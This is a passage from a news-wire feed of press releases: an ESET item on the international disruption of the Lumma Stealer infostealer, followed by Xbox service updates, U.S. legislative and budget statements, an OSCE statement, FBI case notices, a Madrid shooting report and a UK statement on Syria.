    Lumma Stealer developers had been actively developing and maintaining the malware. ESET has regularly spotted code updates ranging from minor bugfixes to complete replacement of string encryption and updates to the network protocol. The operators of the botnet also actively maintained the shared network infrastructure. Between 17 June 2024 and 1 May 2025, ESET observed a total of 3,353 unique C&C domains, with an approximate average of 74 new domains emerging each week, including occasional updates to Telegram-based dead drop resolvers. This ongoing evolution underscores the significant threat posed by Lumma Stealer and highlights the importance of the disruption efforts.

    Lumma Stealer adopts the concept of malware as a service, where affiliates pay a monthly fee based on their tier to receive the latest malware builds and the network infrastructure necessary for data exfiltration. The tiered subscription model features price ranges from $250 to $1000 per month, each with increasingly sophisticated features. The operators of Lumma Stealer have also created a Telegram marketplace for affiliates, with a rating system to sell stolen data without intermediaries. Common distribution methods include phishing, cracked software, and other malware downloaders. Lumma Stealer employs a few, but effective, anti-emulation techniques that make analysis as complicated as possible. These techniques are designed to evade detection and hinder the efforts of security analysts.

    Microsoft’s Digital Crimes Unit has facilitated the takedown, suspension, seizure, and blocking of the malicious domains that formed the backbone of Lumma Stealer’s infrastructure via a court order granted by the United States District Court of the Northern District of Georgia. In coordination, the U.S. Department of Justice simultaneously also seized the Lumma Stealer control panel, targeting the Lumma Stealer marketplace – and in turn the purchasers of Lumma Stealer malware. This was coordinated with Europol’s European Cybercrime Center (EC3) as well as Japan’s Cybercrime Control Center (JC3), which facilitated the suspension of locally based Lumma Stealer infrastructure.

    “This global disruption operation was made possible by our long-term tracking of Lumma Stealer. The disruption operation led by Microsoft aimed to seize all known Lumma Stealer C&C domains, making the exfiltration infrastructure of Lumma Stealer non-functional. However, ESET will continue to track other infostealers while closely monitoring for Lumma Stealer activity following this disruption operation,” concludes Tomanek.

    For an overview of the Lumma Stealer ecosystem and both a technical analysis and look at the evolution of Lumma Stealer’s key static and dynamic properties critical to the disruption effort, check out the latest ESET Research blogpost, “ESET takes part in global operation to disrupt Lumma Stealer” on WeLiveSecurity.com. Make sure to follow ESET Research on Twitter (today known as X), Bluesky, and Mastodon for the latest news from ESET Research.

    Lumma Stealer detection rate based on ESET telemetry (data since July 2024)

    About ESET
    ESET® provides cutting-edge digital security to prevent attacks before they happen. By combining the power of AI and human expertise, ESET stays ahead of emerging global cyberthreats, both known and unknown — securing businesses, critical infrastructure, and individuals. Whether it’s endpoint, cloud, or mobile protection, our AI-native, cloud-first solutions and services remain highly effective and easy to use. ESET technology includes robust detection and response, ultra-secure encryption, and multifactor authentication. With 24/7 real-time defense and strong local support, we keep users safe and businesses running without interruption. The ever-evolving digital landscape demands a progressive approach to security: ESET is committed to world-class research and powerful threat intelligence, backed by R&D centers and a strong global partner network. For more information, visit www.eset.com or follow our social media, podcasts, and blogs.

    A photo accompanying this announcement is available at https://www.globenewswire.com/NewsRoom/AttachmentNg/3e248b2b-dcbf-42cb-93ac-a4b4668bbc31

    The MIL Network

  • MIL-OSI Banking: Xbox Game Pass members can now play Activision’s Retro Classics

    Source: Microsoft

    Headline: Xbox Game Pass members can now play Activision’s Retro Classics

    We’re thrilled to announce the launch of Retro Classics, a collaboration between Xbox and Antstream Arcade, available to play for Game Pass members globally. Starting today, Game Pass members can dive into a collection of 50+ classic Activision games from the ’80s and ’90s, including beloved titles like Commando, Grand Prix, Kaboom!, Mech Warrior 2: 31st Century Combat, and Pitfall! This initiative is a step in our commitment to game preservation and backwards compatibility, allowing players to experience many timeless games on modern devices.

    With Retro Classics, Game Pass members can expect a seamless gaming experience across console, PC, and on supported devices with cloud gaming. Whether playing on Xbox console, the Xbox app on PC, or streaming on supported LG and Samsung Smart TVs, Amazon Fire TV devices, and Meta Quest headsets, Retro Classics offers a versatile and accessible way to enjoy these nostalgic titles. Game Pass members can access Retro Classics through their Game Pass membership by searching and installing the feature via their console or on the Xbox app on PC. Additionally, players can take on friends, rivals, or the entire world with unique challenges. For the achievement hunters, there are some great new ones to collect, and for newer players, the ability to save and reload your progress, a first for many classic titles.


    This launch is just the beginning. Game Pass members can look forward to additional games from Activision and Blizzard, expanding the Retro Classics collection to more than 100 titles over time.

    For more information on Retro Classics, see here.

    PC Gaming

    Game Bar Updates – Quick settings and widgets

    To further enhance the gameplay experience with Game Bar, we’ve revamped the Settings widget with quick settings and continued visual updates to the remainder of the inbox widgets. The new quick settings will be accessible in both Compact Mode and Desktop Mode across all Windows devices.

    Upon opening the Settings widget, players can now swiftly access a list of quick settings that allow them to adjust audio levels, screen brightness, show a virtual keyboard, turn on Compact Mode, manage connected devices and more, all while minimizing interruptions to gameplay.

    In addition to this, visual updates have been applied to the Widget List, Gallery widget, and Home widget for a more unified look and feel across the experience.

    Game Bar Updates – Microsoft Edge Game Assist

    Microsoft Edge Game Assist is coming soon. As the first in-game browser built specifically for players, Game Assist brings players a full browser along with tips, walkthroughs, playlists, and sites like Discord, Spotify, and Twitch right into their game. Players can use the Windows + G shortcut to open this experience in Game Bar at any time during a gameplay session. As Game Assist is seamlessly connected to the Edge browser, players will have instant access to their favorites, passwords, history, and more, ensuring everything they need is always within reach and keeping their data synched between sessions.

    GeForce Now update

    Xbox players now have an additional option in the Xbox app on PC for playing via cloud gaming, providing even greater flexibility in how they play. GeForce Now has been added as an available option for PC gaming on participating titles, allowing players to choose their preferred streaming platform for gameplay. If a game is available on GeForce Now, players will see a pop-up when clicking the Play button on the product page, at which time they can select their preferred cloud gaming option.

    Xbox Rewards

    Rewards with Xbox – Xbox gift cards in custom amounts now available

    Players can now redeem their Rewards points for Xbox gift cards in any amount on the Rewards hub.

     To customize an Xbox gift card:

    1. On the Rewards hub, go to the catalog and choose “Xbox Gift Card”
    2. Select an amount from the drop-down list OR choose “Custom”
    3. If selecting “Custom,” enter any amount between $5-$100
    4. Select “Redeem Reward” to complete the redemption
    5. Once complete, the gift card will be automatically added to your account balance

    This balance can be used towards purchases of Games, Game Add-ons, Movies and TV Shows or on the latest deals at Xbox.com/Deals. Learn more about redeeming Rewards here.

    Stream your own game – Over 100 games

    We’re continuing to add more games to the Stream your own game collection for Xbox Cloud Gaming (Beta). Game Pass Ultimate members can stream from a library of over 100 cloud-playable games on supported devices.

    Recently added:

    • Arma Reforger
    • Deliver At All Cost
    • Monster Energy Supercross – The Official Videogame 6
    • Project Wingman
    • RIDE 5
    • ROADCRAFT

    Coming soon:

    • Anno 1800 Console Edition – Standard
    • Disney Illusion Island
    • Hello Neighbor 2
    • Just Dance
    • Life is Strange: Before the Storm Episode 1
    • Life is Strange: True Colors
    • MONOPOLY
    • Skull and Bones
    • Sunderfolk
    • Watch Dogs Legion

    Check out the full list of cloud-playable games available to stream on supported devices here. For more information, learn more here.

    Xbox Play Anywhere – Buy once, play anywhere

    With over 1,000 games now supporting Xbox Play Anywhere, players can seamlessly switch between PC, Xbox console, and supported handhelds at no additional cost, bringing even more value to our Xbox players. Progress, including saves, game add-ons, and achievements, is carried over wherever the game is played. Simply log in with an Xbox account on any device to continue playing from where you left off.

    70+ games have been released with this feature so far in 2025! In April, these games came into the Xbox Play Anywhere collection:

    • Amaze!
    • Amerzone – The Explorer’s Legacy
    • Annie:Last Hope
    • Biz Builder Delux
    • Blue Prince
    • Cafe Master Story
    • Clair Obscur: Expedition 33
    • Crime Scene Cleaner
    • FragPunk
    • Hegzis
    • HexaScape: Cyber Defense
    • Hot Rod Mayhem
    • Light-It Up
    • Little Droid
    • Lunar Remastered Collection
    • Mandragora: Whispers of the Witch Tree
    • Meow Moments: Celebrating Geeks & Athletes
    • Moving Houses
    • My Little Universe
    • Ocean Keeper
    • Ruku’s Heart Balloon
    • Sky Revolver
    • South of Midnight
    • Spirit Valor
    • Tempopo
    • Terror Mansion
    • The Elder Scrolls IV: Oblivion Remastered
    • The Epyx Collection: Handheld
    • The Safe Place
    • Towerborne (Game Preview)

    Check out the full list of available games that players can enjoy anywhere.

    In Case You Missed It

    Xbox Accessories – DOOM: The Dark Ages

    As announced in April, the new limited-edition accessories collection for DOOM: The Dark Ages is now available for purchase. This collection celebrates DOOM and the latest chapter in the franchise’s storied history. The full lineup includes an Xbox Wireless Controller, an Xbox Elite Series 2, and an Xbox Series X console wrap. Visit xbox.com to learn more about this limited-edition collection.

    Xbox Consoles – Dynamic Backgrounds

    DOOM: The Dark Ages and Metaphor: ReFantazio introduced new dynamic backgrounds for Xbox Series X|S consoles, allowing players to customize their consoles to match exciting new games.

    To learn how to customize your Xbox Series X|S console by choosing a dynamic background, visit the Xbox Support page.

    Help Shape the Future of Xbox

    Stay tuned to Xbox Wire for future updates and the latest and greatest Xbox news. For support related to Xbox updates, visit the official Xbox Support site.

    We love hearing from the community, whether you have a suggestion for a new feature that you’d like to see added, or you want to give feedback on existing features that could use some improvement. We’re always looking for ways to improve Xbox experiences for players around the world. If you’d like to help create the future of Xbox and get early access to new features, join the Xbox Insider Program today by downloading the Xbox Insider Hub for Xbox Series X|S & Xbox One or Windows PC.

    Happy gaming.

    MIL OSI Global Banks

  • MIL-OSI USA: Congressman Nick Langworthy Introduces Bill to Save Taxpayers, Promote Infrastructure Development, and Increase Jobs

    Source: US Congressman Nick Langworthy (NY-23)

    WASHINGTON, D.C. – Today, Congressman Nick Langworthy (NY-23) introduced the Infrastructure Expansion Act, which would reform New York’s antiquated liability law on federally funded projects, reduce taxpayer costs, and promote more construction and jobs in our state.  This legislation will preempt state law and align New York with 49 other states which utilize a comparative negligence standard to assess fault when injuries occur on a construction site.

    “This bill is urgently needed to preempt this broken liability standard on federally funded projects and get New York building again,” said Congressman Langworthy. “New York’s Scaffold Law is a gift to trial lawyers and a burden on our construction workers and taxpayers, and it must change.”

    “It is estimated that the scaffold law increases total construction costs between 5 and 10%. This only-in-New York law, dating from 1885, doesn’t protect workers and unnecessarily increases the cost for building roads and bridges, hospitals, schools, affordable housing, industrial facilities, and office buildings.

    “The last state to have such a law was Illinois which repealed its statute in 1995.  Since Albany refuses to act, federal preemption is the only path to proceed.  Enactment of this law will save at least $2 billion in federal tax dollars over the next 10 years and significant savings to state taxpayers. 

    “My hope is that this law, if enacted, will finally force Albany to reform this law, saving millions each year in construction costs to build schools, residential housing, and other projects which are not typically funded by Washington. Significant technology projects, such as Micron outside Syracuse and other projects all throughout New York State would see a reduced cost of construction,” continued Langworthy.

    New York State’s outdated Scaffold Law imposes absolute liability on property owners and contractors for elevation-related injuries—regardless of a worker’s own negligence. This unique-to-New York mandate has made construction insurance skyrocket, driving up the cost of housing, schools, and infrastructure across the state. New York’s law has also resulted in significant fraud as staged accident suits have flooded the courts. This situation was recently documented in an ABC News national story on construction and legal fraud, most of which occur in New York State due to the scaffold law. 

    Original cosponsors of this legislation include Rep. Claudia Tenney (R-NY) and Rep. Elise Stefanik (R-NY).

    “New York’s burdensome and misguided Scaffold Law has caused construction costs to skyrocket, making it one of most expensive states to build in the country. The Infrastructure Expansion Act will lower costs on federally funded projects by finally bringing fairness and balance to liability rules. This is a critical step toward bringing investments to our state and making New York more affordable and competitive,” said Congresswoman Tenney.

    Groups that support this legislation include the American Council of Engineering Companies of New York, Associated Builders and Contractors of New York State, Associated General Contractors of New York, Associated General Contractors of New York State, Building Trades Employer Association, Business Council of New York State, Inc., Big “I” New York, General Contractors Association, General Contractors Association of New York, Lawsuit Reform Alliance of New York, Long Island Builders Institute, National Association of Home Builders, National Electrical Contractors Association, New York Association of Homebuilders, New York Association of Towns, New York State Association for Affordable Housing, New York State Builders Association, New York State Business Council, Partnership for New York City, Real Estate Board of New York, Upstate United, and Habitat for Humanity.

    “This legislation is necessary for all future development projects in New York State because it addresses the biggest ongoing concern we hear from our businesses: affordability. New York is the only state with this kind of law, which mandates unnecessary provisions that only raise the cost of doing business. Congressman Langworthy’s bill is critical to ensure key economic development projects remain affordable, such as reconstructing Penn Station and bringing high-paying jobs and economic growth to Syracuse through Micron,” said Heather Mulligan, President and CEO, Business Council of New York State, Inc.

    “New York is the most expensive city in America, with the high cost of construction being a major contributor. Local legislators have been unwilling to override special interests to deal with our affordability crisis. We support the legislation introduced by Representative Langworthy that promises to impose needed fiscal discipline that we cannot seem to achieve on our own,” said Kathryn Wylde, President and CEO, Partnership for New York City.

    “This commonsense legislation replaces outdated absolute liability rules with a fair and modern comparative negligence standard for federally assisted construction projects. This long-overdue reform will help reduce fraud, lower insurance premiums, and establish a more balanced legal framework for both builders and workers. Escalating insurance costs threaten the viability of construction projects, drive up consumer costs, and delay critical development needed to address housing and infrastructure demands. This legislation is a necessary step toward restoring fairness and long-term sustainability in construction-related liability policies. We commend Congressman Langworthy for his leadership on this important issue and urge swift passage of this vital legislation,” said Mike Fazio, Executive Vice President, New York State Builders Association.

    “The Long Island Builders Institute supports the Infrastructure Expansion Act of 2025. This bill replaces outdated absolute liability rules with a fair comparative negligence standard for federally assisted infrastructure and transportation projects. By preempting such state laws and standardizing liability rules, this legislation ensures a balanced legal framework that encourages participation in federally supported projects without compromising worker protections. We applaud Representative Langworthy’s leadership and urge Congress to pass this commonsense reform,” said Mike Florio, CEO, Long Island Builders Institute.

    “The National Association of Home Builders commends Rep. Nick Langworthy (R-N.Y.) for introducing the Infrastructure Expansion Act. At a time when rising construction and insurance costs are driving up overall project expenses, this bill would help reduce costs and better use valuable taxpayer dollars by implementing reasonable and fair liability standards for certain federally funded projects,” said Buddy Hughes, Chairman, National Association of Home Builders. 

    “The Scaffold Law costs New Yorkers nearly $800 million a year without delivering any tangible construction safety benefits, and as a result, we are hindering the economic growth of our communities statewide, preventing safe development from moving forward and creating new jobs and new business opportunities,” said John T. Evers, President and CEO, American Council of Engineering Companies of New York (ACEC New York). “New York needs reasonable regulations that eliminate unnecessary costs, and this bill does just that by removing the requirements for higher-rate insurance on projects that receive federal funding. With this proposed legislation, we can expand the size, scope and number of public works projects that are critical to improving the built environment around us, and we applaud the work of Congressman Nick Langworthy and his fellow lawmakers for their efforts to reverse this alarming trend.”

    “We’re grateful that Congressman Langworthy has heard the concerns of New York’s contractor community. His legislation takes aim at decades of abuse caused by an outdated, New York-only law that has helped make us one of the most expensive places to build in the country. When passed, it will help bring insurance carriers back to New York and make general liability coverage more affordable—allowing us to build more housing and repair our roads and bridges. We look forward to working with the Congressman to get this much-needed legislation across the finish line,” said Brian Sampson, ABC Empire State Chapter President.

    “The Scaffold Act is a costly mandate that places undue fiscal burdens on towns and their taxpayers when trying to complete projects in their respective communities. We need this commonsense reform that will lower costs, protect the taxpayers, and help spur more investments in our infrastructure and in economic development projects across the state,” said Christopher A. Koetzle, Executive Director, New York Association of Towns.

    “Upstate United applauds Congressman Langworthy for introducing federal legislation that would reform New York’s outdated and costly ‘Scaffold Law.’ Originally enacted in the 1880s—when worker protections were minimal—the law now imposes an absolute liability standard for gravity-related construction accidents, a policy unique to New York. As a result, our state faces the highest general liability insurance costs for construction in the nation, burdening taxpayers with hundreds of millions of dollars each year. This proposed legislation would eliminate the absolute liability standard for federally funded projects, helping to reduce unnecessary costs and support job growth. We hope to see this legislation advance in D.C. and call on New York’s leaders to pursue long-overdue reforms at the state level,” said Justin Wilcox, Upstate United.

    “The Empire State will never resolve its affordable housing crisis, properly invest in public infrastructure and transportation, or attract and retain the industries of the future if the only-in-New York Scaffold Law continues to waste public funds on liability costs,” said Tom Stebbins, Executive Director, Lawsuit Reform Alliance of New York. “Congressman Langworthy’s bill is a step in the right direction. It protects taxpayers’ money from being siphoned from federal projects to pay for lawsuits that benefit no one except the personal injury lawyer lobby. Congress is taking note, when will Albany act?”

    “One of the main drivers of the high cost of construction in New York City is our antiquated Scaffold Law, which serves to protect special interests rather than any jobsite the law purportedly makes safer. Rep. Langworthy’s bill takes this outdated law head on, and if passed will allow our city to focus resources on the projects that matter, rather than increased insurance premiums and lawsuit settlements. Driving costs down and making New York City more affordable requires bold action at all levels, and Rep. Langworthy’s proposed legislation is a strong step in the right direction,” said James Whelan, President, Real Estate Board of New York.

    “Congressman Langworthy’s bill takes aim at New York’s century-old Scaffold Law and its unjust absolute liability standard—a relic that saddles taxpayers with billions in extra costs while doing nothing to make jobsites safer.  By replacing absolute liability with the same commonsense comparative-negligence standard, we can steer precious federal dollars toward rebuilding schools, roads, and affordable housing instead of lining trial-lawyer pockets. We applaud the Congressman’s leadership and stand ready to help get this done for workers, taxpayers and our economy,” said Mike Elmendorf, President & CEO of the Associated General Contractors of New York State.

    “Congressman Langworthy’s bill is a long-overdue step toward restoring fairness and affordability in New York’s construction industry. The Scaffold Law’s absolute liability standard, which is unique to New York, inflates insurance costs by as much as 7%, directly driving up the price of affordable housing and infrastructure statewide. Reforming this outdated law is not just common sense, it’s essential to addressing our affordability crisis and ensuring that coveted federal dollars are spent building homes and communities, not fueling a broken legal system,” said Jolie Milstein, President and CEO, New York State Association for Affordable Housing.

    “Representative Langworthy’s bill gives us a direct path to lowering costs on federally funded projects. Insurance costs in New York City are unreasonably high. Bringing down costs will mean more construction; more construction means more union construction jobs. Let’s get this much needed legislation across the finish line and bring more construction and construction jobs to New York,” said Elizabeth Crowley, President and CEO, Building Trades Employer Association.

    “Congressman Langworthy’s bill will help in removing the effects of outdated laws on NYS’s highest in the nation insurance costs,” said Robert G. Wessels, Executive Director of the General Contractors Association of New York. “The savings obtained by decreasing the extreme cost paid by NY Contractors, for insurance on public works projects, can be used for further investment in critical infrastructure projects.”

    “The National Electrical Contractors Association (NECA) strongly supports the Infrastructure Expansion Act of 2025 and applauds Congressman Nick Langworthy for his leadership in advancing this vital legislation. By ensuring that federal infrastructure projects are governed by a fair, comparative negligence standard rather than outdated absolute liability rules, this bill protects both contractors and property owners while preserving access to critical federal funding.
    On behalf of our several hundred electrical contractors across New York State, we thank Rep. Langworthy for standing up for the skilled professionals who power and build America’s infrastructure. This commonsense reform promotes safety, accountability, and much-needed investment in our nation’s roads, bridges, transit systems, and energy networks,” said Marco Giamberardino, SVP, Government and Public Affairs, National Electrical Contractors Association (NECA).

    MIL OSI USA News

  • MIL-OSI Europe: OSCE on the RSNA’s adoption of the Law on financing of political organizations

    Source: Organization for Security and Co-operation in Europe – OSCE

    Headline: OSCE on the RSNA’s adoption of the Law on financing of political organizations

    SARAJEVO, 21 May 2025 – Following the adoption of the Law on financing of political organizations before the Republika Srpska National Assembly (RSNA), the OSCE Mission to BiH cautions authorities in Republika Srpska that the adoption of such a law risks (i) expanding the space for political corruption and creating unequal treatment between governing and opposition parties; and (ii) undermining the right of all political actors in Republika Srpska to pursue their political objectives through democratic means. Moreover, it does not establish adequate sanctions for violations of provisions of this law. The OSCE Mission to BiH calls on the RSNA to reassess its adoption.

    MIL OSI Europe News

  • MIL-OSI Security: Missouri Man Sentenced to Over 19 Years in Prison for Transporting Minor for Sex

    Source: Federal Bureau of Investigation FBI Crime News (b)

    ST. LOUIS – U.S. District Judge Henry E. Autrey on Tuesday sentenced a man who admitted transporting a minor across state lines for sex to 230 months in prison.

    Scott M. Arnold-Micke, 48, of Rolla, Missouri, met the 17-year-old victim in 2021 and took him to Chicago, where they used drugs and engaged in sexual acts. Arnold-Micke engaged in drug use with the victim on an almost daily basis after Arnold-Micke moved from Sullivan, Missouri to Rolla.

    Arnold-Micke, 48, pleaded guilty in January to one count of transportation of a minor to engage in a criminal sex act.

    The case was investigated by the FBI and the Rolla Police Department with assistance from the Phelps County Sheriff’s Department.  Assistant U.S. Attorney Dianna Edwards prosecuted the case.

    “The FBI is unrelenting when it comes to protecting children,” said Special Agent in Charge Chris Crocker of the FBI St. Louis Division. “I commend those who brought this crime to light in order to get this child predator off the streets and in prison where he belongs.”

    This case was brought as part of Project Safe Childhood, a nationwide initiative to combat the growing epidemic of child sexual exploitation and abuse launched in May 2006 by the Department of Justice. Led by U.S. Attorneys’ Offices and the Department of Justice Criminal Division’s Child Exploitation and Obscenity Section, Project Safe Childhood marshals federal, state and local resources to better locate, apprehend and prosecute individuals who exploit children via the Internet, as well as to identify and rescue victims. For more information about Project Safe Childhood, please visit www.justice.gov/psc.
    MIL Security OSI

  • MIL-OSI USA: Ranking Member Kaptur Remarks at Fiscal Year 2026 Army Corps of Engineers and the Bureau of Reclamation Budget Hearing

    Source: United States House of Representatives – Congresswoman Marcy Kaptur (OH-09)

    Full Hearing Recording Available Here

    Washington, DC — Congresswoman Marcy Kaptur (OH-09), Ranking Member of the Energy and Water Development and Related Agencies Subcommittee, delivered the following remarks at the subcommittee’s fiscal year 2026 budget hearing for the Army Corps of Engineers (Civil Works) and the Bureau of Reclamation:

    Thank you, Mr. Chairman. Good morning, everyone. Thank you for joining us. You build America, and we respect that. I welcome this opportunity to examine recent actions for the budget requests for the Corps of Engineers and the Bureau of Reclamation.

    Thank you to our witnesses for devoting your lives to the nation and for joining us today. Your agencies play a critical role in developing the resources of our land while mindful of our obligations to future generations. Your vital work strengthens our economy, sustains life on Earth, and ensures public safety against the now constant onslaught of both increasing natural and human-caused disasters across our country, which is growing in population, headed to half a billion people. For example, the Corps played a vital role in clearing the waterways after the Key Bridge collapse in Baltimore. Thank you so much. And you are currently carrying out wildfire debris removal in Los Angeles County. Thank you for your exemplary service to our country. You hold us together, and all those who serve in the Corps and the Bureau.

    The proposed cuts to the US Army Corps of Engineers and the Bureau of Reclamation are not just misguided — they are dangerous. Slashing their budgets and eroding their workforce endangers people’s lives and public safety, undermines economic growth, and weakens our national — the national welfare of the country — in the face of climate change.

    Let’s start with the Corps of Engineers. Your work is not just about dams and levees. It’s about protecting lives and building America’s public infrastructure to manage flood control systems that safeguard our communities from the devastating effects of extreme weather. And we saw that this past week, with the terrible tornadoes from St. Louis and all surrounding states.

    Along the shores of Lake Erie — the largest freshwater system in the world — we know what’s at stake. Erosion, rising lake levels, the problems with algal blooms, and increasingly violent storms threaten homes, businesses, and public assets. We cannot build a safe and a habitable environment for our growing population on shrinking budgets and shrinking staff.

    In the Great Lakes region, modernization of projects like the Soo Locks is a prime example of long overdue investments that will turbocharge our economy. One hundred percent of America’s domestic iron ore passes through the Soo Locks. Think about how important that makes this strategic infrastructure.

    Steel is a $500 Billion industry, it supports 123 thousand middle-class jobs, and I’m a strong advocate for reshoring the US steel industry and growing those numbers, but we have to modernize the shipping lanes and the waterways, and our ports, for today and the future. This project will ensure our heartlands’ maritime, industrial, agricultural, and commercial products are safe and efficiently moved.

    Think about our region, it is the shortest distance by way of the Atlantic Ocean to the ports of northern Europe and beyond. Canada, the Great Lakes, and St. Lawrence Seaway hasten global trade, and President Eisenhower understood its place within our continental enterprise and global defense. So must we, as we witness the dawn of the new arctic age.

    Similarly, the Brandon Road project aims at arresting the potential enormous economic and environmental damage that can be unleashed by the invasion of the Asian carp. They could exterminate local and regional aquatic fish and species, and that would be devastating to our Great Lakes’ $7 Billion fishery and its $16 Billion recreational boating industry. These are astounding numbers.

    The Corps of Engineers has a return on investment of over 200 to 1 in terms of economic benefits for every dollar invested. Ports, locks, and inland waterways maintained by the Corps are vital arteries for our very large nation and its commerce. In the Great Lakes region alone, these investments ensure that goods — from American steel to Ohio soybeans — can reach domestic and global markets. And cuts to this work would cause costly delays, limit our competitiveness, and harm local economies.

    Now, to the Bureau of Reclamation. Though it serves primarily the Western United States, its importance cannot be overstated. The Bureau manages water supply for over 31 million Americans in the dry, and I guess I would say, coming from my part of the country drier, Western states, irrigates 10 million acres of farmland, and generates hydropower for millions of homes.

    In this time of unprecedented drought and water stress, we must bolster — not diminish — Reclamation’s capacity to invest in sustainable water systems and innovative conservation technologies. Presidents Theodore Roosevelt and Herbert Hoover understood what development west of the Mississippi River would require. So must we.

    Let’s be clear: disinvestment in the Corps and Bureau now will lead to higher costs down the road. Deferred maintenance becomes disaster recovery. Preventable failures become national emergencies.

    I urge my colleagues on both sides of the aisle — this is not the time to retreat. It is time to lead. We must provide these agencies with the resources they need to protect our growing population, strengthen our economy, and safeguard our environment for generations to come.

    Finally, I truly condemn the extreme politicization of critical Army Corps’ construction funding decisions, as we saw in last week’s work plan. It is yet another reminder that Congress must reclaim its authority over funding decisions by passing full-year appropriations bills.

    Thank you, Mr. Chairman, and Members and our guests. I yield back.

    # # #

    MIL OSI USA News

  • MIL-OSI Russia: Ukrainian shot dead near American School of Madrid

    Translation. Region: Russian Federal

    Source: People’s Republic of China in Russian –

    Source: People’s Republic of China – State Council News

    MADRID, May 21 (Xinhua) — Spain’s National Police have launched an investigation into the murder of a 52-year-old Ukrainian citizen who was shot dead on Wednesday morning outside the American School in the Madrid suburb of Pozuelo de Alarcon.

    The incident occurred at around 09:15 local time /08:15 GMT/. Emergency medical personnel who arrived at the scene confirmed the man’s death from four gunshot wounds to the chest and one to the head. The injuries were assessed as “incompatible with life.”

    As a precaution, classes at the school were immediately suspended. No other casualties were reported. Parents of the students told local media that the deceased was the father of one of the students at the school.

    Although the investigation is still ongoing, preliminary police information suggests that the assailant was waiting for the victim on a motorcycle. Spanish radio station Cadena Ser identified the victim as Andriy Portnov, a former adviser to ex-Ukrainian President Viktor Yanukovych. –0–

    MIL OSI Russia News

  • MIL-OSI United Kingdom: The UK will keep supporting the Syrian people to rebuild their country and economy: UK statement at the UN Security Council

    Source: United Kingdom – Executive Government & Departments

    Speech

    The UK will keep supporting the Syrian people to rebuild their country and economy: UK statement at the UN Security Council

    Statement by Ambassador James Kariuki, UK Deputy Permanent Representative to the UN, at the UN Security Council meeting on Syria.

    We are encouraged to hear about the UN’s progress in strengthening engagement with the new Syrian Government.

    I will make three points today.

    First, we welcome President Trump’s announcement of the lifting of US sanctions.

    This positive step will create significant opportunity for economic recovery and development across Syria.  

    This follows the UK’s decision in April to lift our own sectoral sanctions on areas including trade, energy production and finance.

    We remain steadfast in our commitment to supporting the Syrian people in rebuilding their country and economy.

    Second, whilst economic recovery is vital, it must go hand in hand with an inclusive and peaceful transition that reconciles Syria’s diverse groups.

    The UK was appalled by the attacks this month against the Druze community in Syria. 

    There can be no lasting peace or better future for Syrians unless all of Syria’s communities are protected and fully included in Syria’s political transition.

    We call on all parties to reject violence, engage in dialogue and ensure the protection of civilians.

    We note progress in reconciling Syrian groups into centralised structures. 

    Existing agreements, including those signed with the Syrian Democratic Forces and with the Druze leadership, should now be implemented in full.

    We also call on Israel to refrain from actions that risk destabilising Syria and to respect Syria’s sovereignty and territorial integrity.

    Third, as the new Syrian Government enters its third month, we look forward to seeing a clear timeline for next steps in the political transition. 

    We welcome and stand ready to support the newly announced National Commissions for Transitional Justice and for Missing Persons. Both will help Syria heal and move forward after years of suffering. 

    This political transition should be inclusive and allow Syrians to have a say in what comes next.

    President, in conclusion, the UK stands ready to support the Syrian Government in their next steps on the path towards a more prosperous, peaceful and stable future that the Syrian people deserve.

    Updates to this page

    Published 21 May 2025

    MIL OSI United Kingdom

  • MIL-OSI Security: Pagan’s Motorcycle Club Member Pleads Guilty for Armed Assault and Attempted Assault Against Rivals

    Source: Federal Bureau of Investigation (FBI) State Crime Alerts (b)

    KANSAS CITY, Mo. – A member of the Pagan’s Motorcycle Club pleaded guilty today before U.S. District Judge Greg Kays for his involvement in an armed assault and an attempted armed assault against members of rival motorcycle clubs.

    Jeremiah Z. Hahn, also known as “Pass Out,” 42, of Cameron, Mo., pleaded guilty today to one count of assault with a dangerous weapon in aid of racketeering, one count of attempting to commit assault with a dangerous weapon in aid of racketeering, and one count of felon in possession of a firearm.

    On May 30, 2022, Hahn and other members of the Pagan’s and their support club assaulted a lone rival motorcycle gang member at a business in Grain Valley, Mo. In addition to fists, Hahn used an axe handle during the assault, causing physical injury to the victim.

    On Sep. 3, 2022, Hahn and other members of the Pagan’s and their support club travelled to Topeka, Ks., to carry out a revenge attack against another rival motorcycle gang. The plan was to “catch a stray” and “smash on sight” any rival member they saw. The Pagan’s were aware that the rival motorcycle gang was having an event in Topeka that day, and the plan was to use either an axe handle or a gun on one of the rival gang members. After arriving in Topeka, a rival member was spotted in a hotel parking lot. As Hahn, who was armed with a gun, prepared to shoot the rival, a disagreement occurred among members, and the group returned to the Kansas City area.

    Following both events, Hahn and others present were awarded patches for their participation.

    On May 3, 2023, Hahn was stopped by a Missouri State Highway Patrol Trooper on eastbound Highway 36 in Dekalb County, Mo., for speeding. Hahn, who was riding a black, 2012 Harley Davidson motorcycle, had passed the trooper, traveling 98 mph in a 65-mph zone. Initially, Hahn attempted to flee the trooper and reached speeds ranging from 100-102 mph before stopping. Following Hahn’s arrest, the trooper discovered a Smith and Wesson, model M&P Shield, .40 caliber semi-automatic handgun in Hahn’s front pants pocket. Hahn, who had felony convictions out of Oklahoma, Kansas, and Missouri, stated that he had stolen the gun approximately a week and a half earlier from a member of a rival motorcycle club in St. Joseph, Mo.

    Under federal statutes, Hahn is subject to a sentence of up to twenty years in prison without parole. The maximum statutory sentence is prescribed by Congress and is provided here for informational purposes, as the sentencing of the defendant will be determined by the court based on the advisory sentencing guidelines and other statutory factors. A sentencing hearing will be scheduled after the completion of a presentence investigation by the United States Probation Office.

    This case is being prosecuted by Assistant U.S. Attorneys Bradley K. Kavanaugh and Robert Smith. It was investigated by the FBI, the Independence, Mo., Police Department, the Blue Springs, Mo., Police Department, Homeland Security Investigations, and the Kansas City, Mo., Police Department.

    Organized Crime and Drug Enforcement Task Force

    This case is part of an Organized Crime Drug Enforcement Task Forces (OCDETF) operation. OCDETF identifies, disrupts, and dismantles the highest-level criminal organizations that threaten the United States using a prosecutor-led, intelligence-driven, multi-agency approach. Additional information about the OCDETF Program can be found at https://www.justice.gov/OCDETF.

    MIL Security OSI

  • MIL-OSI Security: Kansas City Man Charged with Hobbs Act Robbery and Firearm Violations

    Source: Federal Bureau of Investigation (FBI) State Crime Alerts (b)

    KANSAS CITY, Mo. – A Kansas City, Mo., man was indicted by a federal grand jury today for robbing fourteen convenience stores at gunpoint. He also faces charges for attempting to rob another convenience store and illegally possessing a firearm.

    Marquise L. North, 31, of Kansas City, Mo., was charged in a thirty-one count indictment returned by a federal grand jury in Kansas City, Mo.

